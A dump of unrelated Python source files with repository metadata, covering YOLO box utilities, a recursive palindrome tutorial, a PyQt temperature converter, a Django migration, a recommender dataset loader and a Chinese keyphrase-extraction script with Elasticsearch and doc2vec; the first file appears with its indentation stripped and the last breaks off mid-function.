cls_confs = convert2cpu(cls_confs.view(-1, num_classes))
t2 = time.time()
for b in range(batch):
boxes = []
for cy in range(h):
for cx in range(w):
for i in range(num_anchors):
ind = b*sz_hwa + i*sz_hw + cy*w + cx
det_conf = det_confs[ind]
if only_objectness:
conf = det_confs[ind]
else:
conf = det_confs[ind] * cls_max_confs[ind]
#print('conf',conf)
if conf > conf_thresh:
bcx = xs[ind]
bcy = ys[ind]
bw = ws[ind]
bh = hs[ind]
cls_max_conf = cls_max_confs[ind]
cls_max_id = cls_max_ids[ind]
box = [bcx/w, bcy/h, bw/w, bh/h, det_conf, cls_max_conf, cls_max_id]
if (not only_objectness) and validation:
for c in range(num_classes):
tmp_conf = cls_confs[ind][c]
if c != cls_max_id and det_confs[ind]*tmp_conf > conf_thresh:
box.append(tmp_conf)
box.append(c)
boxes.append(box)
all_boxes.append(boxes)
t3 = time.time()
if False:
print('---------------------------------')
print('matrix computation : %f' % (t1-t0))
print(' gpu to cpu : %f' % (t2-t1))
print(' boxes filter : %f' % (t3-t2))
print('---------------------------------')
return all_boxes
def plot_boxes_cv2(img, boxes, savename=None, class_names=None, color=None):
import cv2
colors = torch.FloatTensor([[1,0,1],[0,0,1],[0,1,1],[0,1,0],[1,1,0],[1,0,0]]);
def get_color(c, x, max_val):
ratio = float(x)/max_val * 5
i = int(math.floor(ratio))
j = int(math.ceil(ratio))
ratio = ratio - i
r = (1-ratio) * colors[i][c] + ratio*colors[j][c]
return int(r*255)
width = img.shape[1]
height = img.shape[0]
for i in range(len(boxes)):
box = boxes[i]
x1 = int(round((box[0] - box[2]/2.0) * width))
y1 = int(round((box[1] - box[3]/2.0) * height))
x2 = int(round((box[0] + box[2]/2.0) * width))
y2 = int(round((box[1] + box[3]/2.0) * height))
if color:
rgb = color
else:
rgb = (255, 0, 0)
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
print('%s: %f' % (class_names[cls_id], cls_conf))
classes = len(class_names)
offset = cls_id * 123457 % classes
red = get_color(2, offset, classes)
green = get_color(1, offset, classes)
blue = get_color(0, offset, classes)
if color is None:
rgb = (red, green, blue)
img = cv2.putText(img, class_names[cls_id], (x1,y1), cv2.FONT_HERSHEY_SIMPLEX, 1.2, rgb, 1)
img = cv2.rectangle(img, (x1,y1), (x2,y2), rgb, 1)
if savename:
print("save plot results to %s" % savename)
cv2.imwrite(savename, img)
return img
def plot_boxes(img, boxes, savename=None, class_names=None):
colors = torch.FloatTensor([[1,0,1],[0,0,1],[0,1,1],[0,1,0],[1,1,0],[1,0,0]]);
def get_color(c, x, max_val):
ratio = float(x)/max_val * 5
i = int(math.floor(ratio))
j = int(math.ceil(ratio))
ratio = ratio - i
r = (1-ratio) * colors[i][c] + ratio*colors[j][c]
return int(r*255)
width = img.width
height = img.height
draw = ImageDraw.Draw(img)
for i in range(len(boxes)):
box = boxes[i]
x1 = (box[0] - box[2]/2.0) * width
y1 = (box[1] - box[3]/2.0) * height
x2 = (box[0] + box[2]/2.0) * width
y2 = (box[1] + box[3]/2.0) * height
rgb = (255, 0, 0)
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
print('%s: %f' % (class_names[cls_id], cls_conf))
classes = len(class_names)
offset = cls_id * 123457 % classes
red = get_color(2, offset, classes)
green = get_color(1, offset, classes)
blue = get_color(0, offset, classes)
rgb = (red, green, blue)
draw.text((x1, y1), class_names[cls_id], fill=rgb)
draw.rectangle([x1, y1, x2, y2], outline = rgb)
if savename:
print("save plot results to %s" % savename)
img.save(savename)
return img
def my_plot_boxes(img, boxes, savedir, class_names,patch_size):
colors = torch.FloatTensor([[1,0,1],[0,0,1],[0,1,1],[0,1,0],[1,1,0],[1,0,0]]);
def get_color(c, x, max_val):
ratio = float(x)/max_val * 5
i = int(math.floor(ratio))
j = int(math.ceil(ratio))
ratio = ratio - i
r = (1-ratio) * colors[i][c] + ratio*colors[j][c]
return int(r*255)
width = img.width
height = img.height
draw = ImageDraw.Draw(img)
for i in range(len(boxes)):
box = boxes[i]
x1 = (box[0] - box[2]/2.0) * width
y1 = (box[1] - box[3]/2.0) * height
x2 = (box[0] + box[2]/2.0) * width
y2 = (box[1] + box[3]/2.0) * height
rgb = (255, 0, 0)
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
print('%s: %f' % (class_names[cls_id], cls_conf))
classes = len(class_names)
offset = cls_id * 123457 % classes
red = get_color(2, offset, classes)
green = get_color(1, offset, classes)
blue = get_color(0, offset, classes)
rgb = (red, green, blue)
draw.text((x1, y1), class_names[cls_id], fill=rgb)
#draw.rectangle([x1, y1, x2, y2], outline = rgb)
if (x2-x1)>patch_size[0] and (y2-y1)>patch_size[1]: #保证截取的图像块位于目标范围内
center_x=(x2-x1)/2+x1
center_y=(y2-y1)/2+y1
for i in range(7):
start_x=np.random.randint(center_x-patch_size[0]/10,center_x+patch_size[0]/10) #在目标范围内随机截取
start_y=np.random.randint(center_y-patch_size[1]/10,center_y+patch_size[1]/10)
box=(start_x-patch_size[0]/2,start_y-patch_size[1]/2,start_x+patch_size[0]/2,start_y+patch_size[1]/2)
pic_patch=img.crop(box)
rnd=np.random.randint(0,10000) #只是为了保存设置的随机区别数字
pic_patch.save(savedir+class_names[cls_id]+'_'+str(patch_size[0])+'_'+str(patch_size[1])+'_'+str(rnd)+'.png')
# if savename:
# print("save plot results to %s" % savename)
# img.save(savename)
return img
def read_truths(lab_path):
if not os.path.exists(lab_path):
return np.array([])
if os.path.getsize(lab_path):
truths = np.loadtxt(lab_path)
truths = truths.reshape(truths.size/5, 5) # to avoid single truth problem
return truths
else:
return np.array([])
def read_truths_args(lab_path, min_box_scale):
truths = read_truths(lab_path)
new_truths = []
for i in range(truths.shape[0]):
if truths[i][3] < min_box_scale:
continue
new_truths.append([truths[i][0], truths[i][1], truths[i][2], truths[i][3], truths[i][4]])
return np.array(new_truths)
def load_class_names(namesfile):
class_names = []
with open(namesfile, 'r') as fp:
lines = fp.readlines()
for line in lines:
line = line.rstrip()
class_names.append(line)
return class_names
def image2torch(img):
width = img.width
height = img.height
img = torch.ByteTensor(torch.ByteStorage.from_buffer(img.tobytes()))
img = img.view(height, width, 3).transpose(0,1).transpose(0,2).contiguous()
img = img.view(1, 3, height, width)
img = img.float().div(255.0)
return img
def do_detect(model, img, conf_thresh, nms_thresh, use_cuda=1):
model.eval()
t0 = time.time()
if isinstance(img, Image.Image):
width = img.width
height = img.height
img = torch.ByteTensor(torch.ByteStorage.from_buffer(img.tobytes()))
img = img.view(height, width, 3).transpose(0,1).transpose(0,2).contiguous()
img = img.view(1, 3, height, width)
img = img.float().div(255.0)
elif type(img) == np.ndarray: # cv2 image
img = torch.from_numpy(img.transpose(2,0,1)).float().div(255.0).unsqueeze(0)
else:
print("unknow image type")
exit(-1)
t1 = time.time()
if use_cuda:
img = img.cuda()
img = torch.autograd.Variable(img)
t2 = time.time()
output = model(img)
output = output.data
#for j in range(100):
# sys.stdout.write('%f ' % (output.storage()[j]))
#print('')
t3 = time.time()
boxes = get_region_boxes(output, conf_thresh, model.num_classes, model.anchors, model.num_anchors)[0]
#for j in range(len(boxes)):
# print(boxes[j])
t4 = time.time()
boxes = nms(boxes, nms_thresh)
t5 = time.time()
if False:
print('-----------------------------------')
print(' image to tensor : %f' % (t1 - t0))
print(' tensor to cuda : %f' % (t2 - t1))
print(' predict : %f' % (t3 - t2))
print('get_region_boxes : %f' % (t4 - t3))
print(' nms : %f' % (t5 - t4))
print(' total : %f' % (t5 - t0))
print('-----------------------------------')
return boxes
def read_data_cfg(datacfg):
options = dict()
options['gpus'] = '0,1,2,3'
options['num_workers'] = '10'
with open(datacfg, 'r') as fp:
lines = fp.readlines()
for line in lines:
line = line.strip()
if line == '' or '#' in line:
continue
key,value = line.split('=')
key = key.strip()
value = value.strip()
options[key] = value
return options
def scale_bboxes(bboxes, width, height):
import copy
dets = copy.deepcopy(bboxes)
for i in range(len(dets)):
dets[i][0] = dets[i][0] * width
dets[i][1] = dets[i][1] * height
dets[i][2] = dets[i][2] * width
dets[i][3] = dets[i][3] * height
return dets
def file_lines(thefilepath):
count = 0
thefile = open(thefilepath, 'rb')
while True:
buffer = thefile.read(8192*1024)
if not buffer:
break
count += buffer.count('\n')
thefile.close( )
return count
def get_image_size(fname):
'''Determine the image type of fhandle and return its size.
from draco'''
with open(fname, 'rb') as fhandle:
head = fhandle.read(24)
if len(head) != 24:
return
if imghdr.what(fname) == 'png':
check = struct.unpack('>i', head[4:8])[0]
if check != 0x0d0a1a0a:
return
width, height = struct.unpack('>ii', head[16:24])
elif imghdr.what(fname) == 'gif':
width, height = struct.unpack('<HH', head[6:10])
elif imghdr.what(fname) == 'jpeg' or imghdr.what(fname) == 'jpg':
try:
fhandle.seek(0) # Read 0xff next
size = 2
ftype = 0
while not 0xc0 <= ftype <= 0xcf:
fhandle.seek(size, 1)
byte = fhandle.read(1)
while ord(byte) == 0xff:
byte = fhandle.read(1)
ftype = ord(byte)
size = struct.unpack('>H', fhandle.read(2))[0] - 2
# We are at a SOFn block
fhandle.seek(1, 1) # Skip `precision' byte.
height, width = struct.unpack('>HH', fhandle.read(4))
except Exception: #IGNORE:W0703
return
else:
return
return width, height
def logging(message):
print('%s %s' % (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), message))
| [
"18765330178@163.com"
] | 18765330178@163.com |
9dcf040005180edb2313c6d17b6c9fa1e1b66bc2 | 74be65db9505041017863eb7b880cd4420164913 | /Recursion.py | 0e868ceb13e34f19e3173fef73234f70ee1de844 | [] | no_license | jackx99/Python-Tutorial | 4dd21d7993376fd8e96e9f62ef0d2c2b80c8b8bf | 0fcdc529094dbebc675dde84847d8c285b536fe3 | refs/heads/master | 2022-07-02T19:23:07.894768 | 2020-05-09T03:14:14 | 2020-05-09T03:14:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,424 | py | # Hello Guys
# When you know the program to use iterative way (while loop, for in loop) but there is a other way
# Learn Recursion the process of solving a problem by reducing it to successively small versions of itself.
# Execute code by small chunks of itself.
# Recursive definition has
# one or more base case(s)
# the general case must eventually reduced to base case
# the base case stops the recursion
"""
A palindrome is a string that reads the same both forward and backward. For example,
the string "madam" is a palindrome. Write a program that uses a recursive method to check
whether a string is a palindrome. Your program must contain a value-returning recursive method
that returns true if the string is a palindrome and false otherwise.
Use appropriate parameters in your method.
"""
def is_palindrome(word):
if len(word) == 0 or len(word) == 1: # The base case
return True
else: # The general case or recursive case
if word[0] == word[len(word) - 1]: # We match first character and last character if evaluates to true
return is_palindrome(word[1 : len(word) - 1]) # The word is reduced slicing the strings between first and end character
# then the function is_palindrome is called with new 'word' value
return False # Otherwise the first character and end character is not equal and end the program
word = "level"
print(is_palindrome(word)) | [
"geek.mohsen@gmail.com"
] | geek.mohsen@gmail.com |
9b9ac8d68ee4e75b58e72cede9cacace96c23920 | 7c55a0d083ad0d26ebd21587b3c5d7512c3e527f | /1132.py | f34412ca23eb4222f8eeb8b36f05109f5f9bd855 | [] | no_license | gabriias/uri_solutions_python | 1f2a9f4391b18719112d9fa91c152310ec8138fe | cb24e7f9fbf746e68a247c7639e886bd36644b90 | refs/heads/master | 2022-03-09T18:33:58.029999 | 2022-02-26T02:29:20 | 2022-02-26T02:29:20 | 125,661,581 | 2 | 2 | null | 2019-10-05T15:15:38 | 2018-03-17T19:17:33 | Python | UTF-8 | Python | false | false | 145 | py | x, y = int(input()), int(input())
soma = 0
if x>y:
x,y = y,x
for cont in range(x,y+1):
if cont % 13 != 0:
soma+=cont
print(soma)
| [
"gabrielamatias60@gmail.com"
] | gabrielamatias60@gmail.com |
564e7ae6d142c78bcd5de942b9a6a69facdfb9d0 | 8e0cdf235cd82e422c62fee3e6d044e4f4ee7614 | /feedback/migrations/0004_remove_translation.py | f0d087297b5ccce43ab6fa90c2ef41ed6fab4ac5 | [
"BSD-3-Clause"
] | permissive | stevecassidy/signbank-feedback | 4ae1c58a95a27428d11ef4a692c52738e9a4fb6f | d4cb8a7f445ca42c90a69d565d43875f50251aa8 | refs/heads/master | 2022-01-14T05:07:31.474605 | 2022-01-12T04:18:42 | 2022-01-12T04:18:42 | 78,930,468 | 1 | 1 | null | 2017-01-14T09:10:43 | 2017-01-14T09:10:43 | null | UTF-8 | Python | false | false | 407 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-09-17 13:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('feedback', '0003_map_translation'),
]
operations = [
migrations.RemoveField(
model_name='signfeedback',
name='translation',
),
]
| [
"steve.cassidy@mq.edu.au"
] | steve.cassidy@mq.edu.au |
d44cc064e0d441102cb7f749ba51da30194382e0 | 9808471fbc87c24439111d3e14f7d63dbd8231f1 | /Hacker/Mul_Client.py | d83f78dd16bd060d316bf9388b515607cf5686c0 | [] | no_license | sreekanthreddyv/CodeFiles | e2794f754394b256ce8efe4328bed673a8d909f8 | ce20ae55196bae21940ffd5dc9ab08256d091ae6 | refs/heads/master | 2020-11-26T11:23:11.445889 | 2020-01-15T07:09:21 | 2020-01-15T07:09:21 | 229,057,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | from multiprocessing.connection import Client
from array import array
address = ('localhost', 6000)
with Client(address, authkey=b'hacker') as conn:
print(conn.recv())
print(conn.recv_bytes())
| [
"sreekanthreddy.v@live.com"
] | sreekanthreddy.v@live.com |
3b73a76ea650e307485d4229dbb14ddf636707d2 | 82916e7e06fd55a9326560de0aeb31e213a0172e | /ConversorTemCaFui.pyw | 782bf96c4e5768759d31e85897273f3997c1768b | [] | no_license | pazmanuelo/PyQt-Converterapp | 54e6f87669b9b3e345fa5999bebdfd0d625e21a5 | 18c08a4c2ccdf04167072b107bb7c0e93f3c8a98 | refs/heads/master | 2021-01-12T09:16:16.306407 | 2016-12-19T20:39:05 | 2016-12-19T20:39:05 | 76,812,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 957 | pyw | import sys
from PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox, QLineEdit, QLabel, QPushButton, QGridLayout
from PyQt5 import uic
from PyQt5.QtGui import QFont
from PyQt5.QtCore import Qt
class Ventana(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
uic.loadUi("ConversorTemCaF.ui", self)
self.setWindowTitle("Conversor de Temperatura")
self.CaF.clicked.connect(self.BCaF)
self.FaC.clicked.connect(self.BFaC)
def BCaF(self):
temp = float(self.temp.text())
conver = temp * 9 / 5 + 32
self.resultado.setText(str(temp) + " ºC es igual a " + str(conver) + " ºF")
def BFaC(self):
temp = float(self.temp.text())
conver = (temp - 32) / 1.8
self.resultado.setText(str(temp) + " ºF es igual a " + str(conver) + " ºC")
app = QApplication(sys.argv)
_ventana = Ventana()
_ventana.show()
app.exec_()
| [
"noreply@github.com"
] | noreply@github.com |
f3413ede669ea92f934c279806562794428aa483 | f853f2ebabba72f4df8b6334e4f20d0517021440 | /rec_datasets.py | 6930f14e188a16717073fd9d576c7d5eadc447f7 | [] | no_license | gpapadop79/ml-recsys-thesis | 782e6bc6a6e0f486e20ae2c359bdfe12962c9c5c | 2d4da1e82ad757e9b915816c62f5e3a770713fee | refs/heads/master | 2021-05-24T01:24:26.851173 | 2020-12-17T09:24:55 | 2020-12-17T09:24:55 | 83,094,158 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,005 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 10 23:46:00 2016
@author: George
Reads a dataset by it's name
"""
import pandas as pd
import numpy as np
def load_dataset(data_path, dataset):
""" Reads a dataset """
if dataset == 'ml-100k':
folder = r'ml-100k\u.data'
separator = '\t'
header = None
elif dataset == 'ml-1M':
# movielens 1M
folder = r'ml-1m\ratings1.dat'
separator = '::'
header = None
elif dataset == 'ml-10M':
# movielens 10M
folder = r'ml-10m\ratings.dat'
separator = '::'
header = None
elif dataset == 'jester-1':
# jester-1
folder = r'jester\jester-1-ratings.txt'
separator = '\t'
header = None
elif dataset == 'jester-4M':
# jester-4M
folder = r'jester\jester-full-ratings.txt'
separator = '\t'
header = None
elif dataset == 'book-crossing':
# book crossing
folder = r'book-crossing\BX-Book-Ratings.csv'
separator = ';'
header = 0
elif dataset == 'epinions':
# epinions
folder = r'epinions-rating\out.epinions-rating'
separator = ' '
header = 0
elif dataset == 'amazon-ratings':
# amazon ratings
folder = r'amazon-ratings\out.amazon-ratings'
separator = ' '
header = 0
elif dataset == 'eachmovie':
# eachmovie
folder = r'eachmoviedata\vote.txt'
separator = '\t'
header = None
elif dataset == 'rec-eachmovie':
# rec-eachmovie
folder = r'rec-eachmovie\rec-eachmovie.edges'
separator = ' '
header = None
elif dataset == 'netflix':
# folder = r'netflix\netflix_mme.txt'
folder = r'C:\Users\Vasso\Desktop\code.graphlab.datasets\netflix_mm.txt'
# folder = r'D:\DATA\netflix_dataset\netflix_mm.txt'
separator = ' '
header = None
elif dataset == 'hetrec2011-lastfm-2k':
# hetrec2011 last.fm 2k
folder = r'hetrec2011-lastfm-2k\user_artists.dat'
separator = '\t'
header = 0
print 'Reading dataset ' + dataset
if dataset == 'netflix':
# data = pd.read_table(folder, sep=separator, header=header, skiprows=3)#, usecols=[0,1,3])
data = pd.read_table(folder, sep=separator, header=header, usecols=[0,1,3], skiprows=3, #nrows=1000000,
names=['user', 'item', 'rating'],
dtype={'user': np.int32, 'item': np.int32, 'rating': np.int32})
else:
data = pd.read_table(data_path + '\\' + folder, sep=separator, header=header)
# data = pd.read_table(data_path + '\\' + folder, sep=separator, header=header,
# names=['user', 'item', 'rating', 'timest'],
# dtype={'user': np.int16, 'item': np.int32, 'rating': np.int32})
#
return data
| [
"gpapadop2012-git@yahoo.gr"
] | gpapadop2012-git@yahoo.gr |
d2046b818de8b7a3c2f53e781304184aa893fe05 | 8f3d0b74f335d3238d4cbbb8c78d7c8c1ce83351 | /data/process_doc2vec.py | 27e632c8a900ae63c4e94352bbfa3ea32b903a1a | [
"Apache-2.0"
] | permissive | LauJames/key_phrase_extract | 6255e444a5260f4e356cd2d733a4dfde3ce759a9 | 5c93353e5f0d7641ce9390f4621b1cedc20220c3 | refs/heads/master | 2020-04-26T22:01:53.834838 | 2019-03-30T11:30:08 | 2019-03-30T11:30:08 | 173,859,205 | 1 | 1 | Apache-2.0 | 2019-03-13T01:54:54 | 2019-03-05T02:38:36 | Python | UTF-8 | Python | false | false | 17,074 | py | #! /user/bin/evn python
# -*- coding:utf8 -*-
import os
import re
import numpy as np
from numpy import linalg
import time, datetime
import gensim
import gensim.models as g
from ir.config import Config
from ir.search import Search
from data import data_IO, evaluate
# 使用es获取指定文档数量的topn篇相关文档(相似性计算文档)
def get_es_results(abstracts, top_n):
start_time = time.time()
es_results = []
config = Config()
search = Search()
for abstract in abstracts:
try:
result = search.search_by_abstract(abstract, top_n, config)
print(result)
print('搜索结果中包含 ' + str(len(result)) + ' 条数据')
es_results.append(result)
except (Exception) as e:
print('ES检索出现异常: Exception:', str(e))
end_time = time.time()
time_used = datetime.timedelta(seconds= int (round(end_time - start_time)))
print('检索耗时:' + str(time_used))
return es_results
# 计算一篇文档与es结果集中文档的相似度 并按相似度降序排序:
# [(1,1),(2,0.8),(3,0.5)...],[(1,0.6),(2,1),(3,0.5)...]
def calculate_doc_sim(doc_vectors):
# v1:目标文档(ES结果集中的第一条)
v1_sim = {}
v1 = doc_vectors[0]
for i in range(len(doc_vectors)):
v2 = doc_vectors[i]
v1_v2_dot = np.dot(v1, v2)
denom = linalg.norm(v1) * linalg.norm(v2)
cos = v1_v2_dot / denom # 余弦值
v1_sim.update({i: cos})
# 按value值降序排序 ============v1_sim转换成了list
v1_sim = sorted(v1_sim.items(), key=lambda d: d[1], reverse=True)
# print('文档相似度计算完毕!\n')
return v1_sim
# 对于一篇文档: 融合其topN篇相似的外部文档的全部key phrase
def get_external(topN_doc_sims, keywords, currunt_docID):
# topN_doc_sims:[(6,0.9),(10,0.8),(3,0.5)...],topN * 2 一篇文档的相似文档及相似度集合
# keywords: es结果集中的所有文档的原始关键术语
external_key_phrase = {}
key_phrases = {} # {'k1':[0.2,0.3]; 'k2':[0.5,0.6,0.8]}
for sim_doc in topN_doc_sims:
# 获取第i篇与本篇doc相似的文档id
sim_docID = sim_doc[0]
# 获取第i篇与本篇doc相似的文档sim
sim = sim_doc[1]
# 跳过当前文档
if sim_docID != currunt_docID:
# 根据相似文档id获取相似文档的关键术语
sim_doc_keys = keywords[sim_docID]
for key in sim_doc_keys:
if not key_phrases.__contains__(key):
key_phrases.update({key: [sim]})
else:
sim_list = key_phrases[key]
sim_list.append(sim)
key_phrases.update({key: sim_list})
# 计算每个key phrase的权重均值
for key in key_phrases:
sim_array = np.array(key_phrases[key])
# 融合权重:取均值
# key_weight = np.average(sim_array)
# 融合权重:求和
key_weight = np.sum(sim_array)
external_key_phrase.update({key: key_weight})
return external_key_phrase
# 对于一篇文档: 融合其topN篇相似的外部文档的全部key phrase
def get_external_doc2vec(topN_doc_sims, keywords, currunt_docID):
# topN_doc_sims:[(125466,0.9),(10,0.8),(3000,0.5)...],topN * 2 --> gensim.models.most_similar()
# keywords: es结果集中的所有文档的原始关键术语
external_key_phrase = {}
key_phrases = {} # {'k1':[0.2,0.3]; 'k2':[0.5,0.6,0.8]}
for i in range(len(topN_doc_sims)):
# 获取第i篇与本篇doc相似的文档的sim值
sim = topN_doc_sims[i][1]
# 跳过当前文档
if i != currunt_docID:
# 根据相似文档id获取相似文档的关键术语
sim_doc_keys = keywords[i]
for key in sim_doc_keys:
if not key_phrases.__contains__(key):
key_phrases.update({key: [sim]})
else:
sim_list = key_phrases[key]
sim_list.append(sim)
key_phrases.update({key: sim_list})
# 计算每个key phrase的权重均值
for key in key_phrases:
sim_array = np.array(key_phrases[key])
# 融合权重:取均值
# key_weight = np.average(sim_array)
# 融合权重:求和
key_weight = np.sum(sim_array)
external_key_phrase.update({key: key_weight})
return external_key_phrase
# 对于一篇文档:融合内外部关键术语
# 目标文档本身权重 p 外部文档权重 1-p
def merge(original_dict, external_dict, p):
merge_dict = {}
# all_keys = original_dict.keys() | external_dict.keys()
for original_key in original_dict:
# 原文档有 外部文档没有
if not external_dict.__contains__(original_key):
weight = p * original_dict[original_key]
# 原文档有 外部文档也有
else:
weight = p * original_dict[original_key] + (1 - p) * external_dict[original_key]
merge_dict.update({original_key: weight})
# 原文档没有 外部文档有
for external_key in external_dict:
if not merge_dict.__contains__(external_key):
weight = (1 - p) * external_dict[external_key]
merge_dict.update({external_key: weight})
return merge_dict
# 对一篇文档:
# def extract_es(es_result, vector_model, vocab, topN, p):
# print('提取当前文档的关键词:')
# start_time = time.time()
# all_merged_kp = []
# 对所有文档:
def extract_all_es(es_results, vector_model, vocab, topN, p):
print('extract_all_es:...')
start_time = time.time()
all_merged_kp = []
# 对一篇文档:
for es_result in es_results:
# es_result 包含目标文档的数据
is_error = False
# 获取当前文档的rake抽取结果
rake_extract = es_result[0][3] # 目标文档在es 搜索结果的第一条
# 处理目标文档的rake_extract
rake_extract_dict = {}
extracs_tmp = rake_extract.split('###')
for m in range(len(extracs_tmp)):
extracs_phrase_weight = extracs_tmp[m].split('|||')
try:
rake_extract_dict.update({extracs_phrase_weight[1]: float(extracs_phrase_weight[0])})
except (Exception) as e:
print('Exception:', str(e))
print('该行提取的关键术语数据有误:' + str(rake_extract))
print('具体数据错误:' + str(extracs_phrase_weight))
is_error = True
m = len(extracs_tmp) + 1
continue
if not is_error:
abstracts = []
keywords = []
for data in es_result:
# 获取当前文档的es检索结果文档
abs_split = re.sub(r'[^\u4e00-\u9fa5a-zA-Z0-9~!@#$%^&*()_+<>?:,./;’,。、‘:“《》?~!@#¥%……()]', ' ', data[1]).split(' ')
for j in range(len(abs_split)):
if not vocab.__contains__(abs_split[j]):
abs_split[j] = 'unknown'
abstracts.append(abs_split)
# 获取结果文档的原始关键术语
keywords.append(data[2].split(';'))
doc_vectors = data_IO.doc2vec(vector_model, abstracts)
doc_sims = calculate_doc_sim(doc_vectors)
# 根据向量相似度大小取topN篇相似文档
topN_doc_sims = doc_sims[:topN + 1] # 相似文档里包含里目标文档本身
external_dict = get_external(topN_doc_sims, keywords, currunt_docID=0)
# 添加归一化操作
external_dict = data_IO.normalization(external_dict)
rake_extract_dict = data_IO.normalization(rake_extract_dict)
one_merge_dict = merge(rake_extract_dict, external_dict, p)
all_merged_kp.append(one_merge_dict)
end_time = time.time()
time_used = datetime.timedelta(seconds=int(round(end_time - start_time)))
print('耗时: ', str(time_used))
return all_merged_kp
# 计算全部文档的rake_dict和external_dict
def get_all_merge_info(es_results, vector_model, vocab, topN):
print('get_all_merge_info:...')
start_time = time.time()
all_merged_info= []
# 对一篇文档:
for es_result in es_results:
# es_result 包含目标文档的数据
is_error = False
# 获取当前文档的rake抽取结果
rake_extract = es_result[0][3] # 目标文档在es 搜索结果的第一条
# 处理目标文档的rake_extract
rake_extract_dict = {}
extracs_tmp = rake_extract.split('###')
for m in range(len(extracs_tmp)):
extracs_phrase_weight = extracs_tmp[m].split('|||')
try:
rake_extract_dict.update({extracs_phrase_weight[1]: float(extracs_phrase_weight[0])})
except (Exception) as e:
print('Exception:', str(e))
print('该行提取的关键术语数据有误:' + str(rake_extract))
print('具体数据错误:' + str(extracs_phrase_weight))
is_error = True
m = len(extracs_tmp) + 1
continue
if not is_error:
abstracts = []
keywords = []
for data in es_result:
# 获取当前文档的es检索结果文档
abs_split = re.sub(r'[^\u4e00-\u9fa5a-zA-Z0-9~!@#$%^&*()_+<>?:,./;’,。、‘:“《》?~!@#¥%……()]', ' ', data[1]).split(' ')
for j in range(len(abs_split)):
if not vocab.__contains__(abs_split[j]):
abs_split[j] = 'unknown'
abstracts.append(abs_split)
# 获取结果文档的原始关键术语
keywords.append(data[2].split(';'))
doc_vectors = data_IO.doc2vec(vector_model, abstracts)
doc_sims = calculate_doc_sim(doc_vectors)
# 根据向量相似度大小取topN篇相似文档
topN_doc_sims = doc_sims[:topN + 1] # 相似文档里包含里目标文档本身
external_dict = get_external(topN_doc_sims, keywords, currunt_docID=0)
# 添加归一化操作
external_dict = data_IO.normalization(external_dict)
rake_extract_dict = data_IO.normalization(rake_extract_dict)
all_merged_info.append([external_dict, rake_extract_dict])
end_time = time.time()
time_used = datetime.timedelta(seconds=int(round(end_time - start_time)))
print('get_all_merge_info()耗时: ', str(time_used))
return all_merged_info
def get_all_merge_info_doc2vec(ids, all_keywords,all_rake_dict, doc2vec_model, topN):
print('get_all_merge_info_doc2vec:...')
start_time = time.time()
all_merged_info = []
# 对一篇文档:
for doc_id in ids:
# 使用gensim doc_vecter_model
doc_vector = doc2vec_model.docvecs[doc_id]
topN_doc_sims = doc2vec_model.docvecs.most_similar([doc_vector], topn=topN) # 在模型全部数据(57w)中抽取相似文档
keywords = []
for id_sim in topN_doc_sims:
id = id_sim[0]
keywords.append(all_keywords[id])
external_dict = get_external_doc2vec(topN_doc_sims, keywords, currunt_docID=0)
# 添加归一化操作
external_dict = data_IO.normalization(external_dict)
rake_extract_dict = data_IO.normalization(all_rake_dict[doc_id]) #当前文档的rake提取结果
all_merged_info.append([external_dict, rake_extract_dict])
print('第' + str(doc_id) + ' 个文档merge信息提取完毕')
end_time = time.time()
time_used = datetime.timedelta(seconds=int(round(end_time - start_time)))
print('get_all_merge_info()耗时: ', str(time_used))
return all_merged_info
# 基于每篇文档的rake提取关键词和原始关键词进行内外部关键词的融合
def extract_all(all_merged_info, p):
start_time = time.time()
all_merged_kp = []
for merged_info in all_merged_info:
external_dict = merged_info[0]
rake_extract_dict = merged_info[1]
one_merge_dict = merge(rake_extract_dict, external_dict, p)
all_merged_kp.append(one_merge_dict)
end_time = time.time()
time_used = datetime.timedelta(seconds=int(round(end_time - start_time)))
print('extract_all()耗时: ', str(time_used))
return all_merged_kp
if __name__ == '__main__':
doc2vec_dir = '../doc2vec/model.bin'
vector_dir = 'sg.word2vec.300d'
file_path = 'doc_test.txt'
file_path_json = 'rake_extract_keyphrase.json'
vocab_dir = 'vocab_sg300d.txt'
merged_results_dir = 'all_merged_results.txt'
es_dir = 'process_es_search.txt'
# evaluate dir:
evaluate_dir = '../evaluate_es_10w_doc2vec2/'
topK_merged_dir = 'topK_merged_results.txt'
# precision_dir = 'precision.txt'
# recall_dir = 'recall.txt'
# avg_dir = 'avg.txt'
data_num = 100000
topN = 10 # 10篇相似文档
p_list = [0, 0.2, 0.5, 0.6, 0.8]
k_list = [2, 4, 6, 8, 10, 12]
# p_list = [0.2]
# k_list = [2]
stop_words = data_IO.get_stopword()
# print('加载词向量模型...')
# word2vec_model = gensim.models.KeyedVectors.load_word2vec_format(fname=vector_dir, binary=False)
# print('词向量模型加载完毕!')
print('加载文档向量模型...')
doc2vec_model = g.Doc2Vec.load(doc2vec_dir)
print('文档向量模型加载完毕!')
# prepare for data
vocab = data_IO.load_vocab(vocab_dir)
ids, _, all_doc_keywords,all_rake_dict = data_IO.load_all_data_json4(file_path_json) #全量
print('abstract_str_list.len: ' + str(len(all_doc_keywords)))
# all_merged_info = data_IO.load_all_temp_info('../merge_info/10w_merge_info.txt')
# print('merged_info加载完毕!')
all_merged_info = get_all_merge_info_doc2vec(ids[0:100000], all_doc_keywords, all_rake_dict[0:100000],
doc2vec_model,10)
# all_merged_info = get_all_merge_info_doc2vec(ids, all_doc_keywords, all_rake_dict, doc2vec_model, 10)
# data_IO.save_es_search_results(all_merged_info, '../merge_info/57w_merge_info.txt')
# print(all_merged_info)
print('计算merge需要的信息完毕!')
# merge:
start_time = time.time()
avg_evaluate = {}
for p in p_list:
print('概率p为 ' + str(p) + ' 的结果:')
if not os.path.exists(evaluate_dir):
